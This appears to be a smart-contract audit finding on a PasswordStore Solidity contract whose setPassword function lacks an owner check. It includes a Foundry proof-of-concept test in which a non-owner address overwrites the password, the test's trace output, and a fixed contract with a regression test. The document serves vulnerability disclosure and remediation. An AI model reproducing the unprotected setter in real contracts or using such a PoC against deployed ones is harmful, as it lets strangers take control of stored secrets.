Anyone can set owner, as opposed to what the PasswordStore contract intends to achieve.
The intention behind the Password contract is to make sure that only a valid owner sets the password and gets to see it, but due to a lack of access control, or even just a require statement, this cannot be achieved.
POC:
Add the following test to test/PasswordStore.t.sol and run it:
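    function test_not_owner_can_set_password() public {
        // Act as an arbitrary non-owner address
        vm.startPrank(address(1));
        string memory expectedPassword = "attackerpassword";
        // No access control, so this call succeeds
        passwordStore.setPassword(expectedPassword);
        // Switch to the owner and read the password back
        vm.startPrank(owner);
        string memory actualPassword = passwordStore.getPassword();
        // The owner now sees the value written by the non-owner
        assertEq(actualPassword, expectedPassword);
    }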
Test Output: [PASS] test_not_owner_can_set_password() (gas: 22538)
Traces:
[22538] PasswordStoreTest::test_not_owner_can_set_password()
├─ [0] VM::startPrank(0x0000000000000000000000000000000000000001)
│ └─ ← ()
├─ [6686] PasswordStore::setPassword(attackerpassword)
│ ├─ emit SetNetPassword()
│ └─ ← ()
├─ [0] VM::startPrank(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38])
│ └─ ← ()
├─ [3320] PasswordStore::getPassword() [staticcall]
│ └─ ← attackerpassword
└─ ← ()
Anyone can set the password
Manual review
Add an "if" or a require statement in the setPassword function to make sure that only the owner can call it. This would help validate the owner.
Anyone can call `setPassword` and set a new password contrary to the intended purpose.
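The recommended owner check and a regression test for it, as an added example that is not the audited project's code. `PasswordStoreFixed`, `s_owner`, `s_password` and the `NotOwner` error are assumed names, and the owner check in `getPassword` is assumed from the stated intent of the contract.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import {Test} from "forge-std/Test.sol";

// Minimal stand-in for PasswordStore with the owner check applied.
// State variable and error names are assumptions, not the audited code.
contract PasswordStoreFixed {
    error NotOwner();
    event SetNetPassword();

    address private s_owner;
    string private s_password;

    constructor() {
        s_owner = msg.sender; // deployer becomes the owner
    }

    function setPassword(string memory newPassword) external {
        // The missing check: reject every caller except the owner.
        if (msg.sender != s_owner) revert NotOwner();
        s_password = newPassword;
        emit SetNetPassword();
    }

    function getPassword() external view returns (string memory) {
        if (msg.sender != s_owner) revert NotOwner();
        return s_password;
    }
}

contract PasswordStoreFixedTest is Test {
    PasswordStoreFixed passwordStore;

    function setUp() public {
        // The test contract deploys the store, so it is the owner.
        passwordStore = new PasswordStoreFixed();
        passwordStore.setPassword("ownerpassword");
    }

    function test_non_owner_cannot_set_password() public {
        // Same caller as the PoC, but the call must now revert.
        vm.prank(address(1));
        vm.expectRevert(PasswordStoreFixed.NotOwner.selector);
        passwordStore.setPassword("attackerpassword");
        // The owner still reads the value it set itself.
        assertEq(passwordStore.getPassword(), "ownerpassword");
    }
}
```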